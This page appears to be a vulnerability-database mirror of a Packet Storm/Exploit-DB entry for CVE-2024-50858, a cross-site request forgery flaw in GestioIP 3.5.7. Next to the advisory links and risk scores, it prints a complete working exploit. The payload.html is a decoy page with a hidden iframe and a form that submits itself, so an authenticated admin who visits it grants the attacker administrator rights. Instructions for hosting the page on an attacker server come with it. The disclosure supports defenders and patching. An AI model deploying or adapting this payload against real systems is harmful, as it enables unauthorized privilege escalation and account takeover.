📄 GestioIP 3.5.7 Cross Site Request Forgery

🗓️ 15 Apr 2025 00:00:00Reported by Maximiliano BelinoType

packetstorm🔗 packetstorm.news👁 276 Views

GestioIP 3.5.7 has CSRF vulnerabilities allowing attackers to perform actions via admin's browser.

Reporter	Title	Published	Views	Family All 10
Circl	CVE-2024-50858	15 Jan 202500:03	–	circl
CNNVD	GestioIP 安全漏洞	14 Jan 202500:00	–	cnnvd
CVE	CVE-2024-50858	14 Jan 202500:00	–	cve
Cvelist	CVE-2024-50858	14 Jan 202500:00	–	cvelist
Exploit DB	GestioIP 3.5.7 - Cross-Site Request Forgery (CSRF)	14 Apr 202500:00	–	exploitdb
NVD	CVE-2024-50858	14 Jan 202522:15	–	nvd
OSV	CVE-2024-50858	14 Jan 202522:15	–	osv
Positive Technologies	PT-2025-2891 · Gestioip · Gestioip	14 Jan 202500:00	–	ptsecurity
RedhatCVE	CVE-2024-50858	23 May 202507:04	–	redhatcve
Vulnrichment	CVE-2024-50858	14 Jan 202500:00	–	vulnrichment

# Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Cross-Site Request Forgery (CSRF)
    # Exploit Author: m4xth0r (Maximiliano Belino)
    # Author website: https://maxibelino.github.io/
    # Author email : max.cybersecurity at belino.com
    # GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50858
    # Date: 2025-01-13
    # Vendor Homepage: https://www.gestioip.net/
    # Software Link: https://www.gestioip.net/en/download/
    # Version: GestioIP v3.5.7
    # Tested on: Kali Linux
    # CVE: CVE-2024-50858
    
    ### Description
    
    The GestioIP application has many endpoints and they are vulnerable to CSRF. This allows an attacker to execute actions through the admin's browser on the application if the admin visits a malicious URL hosted by the attacker. These actions can modify, delete, or exfiltrate data from the application.
    
    ### Prerequisites
    
    The option "Manage - Manage GestioIP - User Management" must be enabled previously.
    
    
    ### Usage
    
    To exploit this vulnerability, an attacker must host ```payload.html``` on an attacker-controlled web server (python3 -m http.server 8090). When an authenticated administrator goes to the attacker's website, the CSRF will execute making the attacker an administrator.
    
    
    ### File: payload.html
    #### example: editing user named 'maxi'
    
    
    <!DOCTYPE html>
    <html lang="en">
    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Welcome to our site</title>
    <style>
    body {
    font-family: Arial, sans-serif;
    text-align: center;
    }
    .container {
    margin-top: 50px;
    }
    iframe {
    display: none;
    }
    </style>
    </head>
    <body>
    <div class="container">
    <h1>Thank you for visiting our site!</h1>
    <p>We are processing your request, please wait a moment...</p>
    <img src="https://placehold.co/150?text=Processing" alt="Processing...">
    </div>
    <!-- hidden iframe -->
    
    <iframe name="hiddenFrame"></iframe>
    
    <!-- The form that makes the POST to GestioIP Server -->
    <form action="[http://localhost/gestioip/res/ip_mod_user.cgi](http://localhost/gestioip/res/ip_mod_user.cgi)" method="POST" target="hiddenFrame">
    <input type="hidden" name="name" value="maxi">
    <input type="hidden" name="group_id" value="1">
    <input type="hidden" name="email" value="[email protected]">
    <input type="hidden" name="phone" value="123">
    <input type="hidden" name="comment" value="">
    <input type="hidden" name="client_id" value="1">
    <input type="hidden" name="id" value="2">
    <input type="hidden" name="B2" value="">
    </form>
    <script>
    history.pushState('', '', '/');
    document.forms[0].submit();
    </script>
    </body>
    </html>

15 Apr 2025 00:00Current

6.7Medium risk

Vulners AI Score6.7

CVSS 3.18.8

EPSS0.01078

SSVC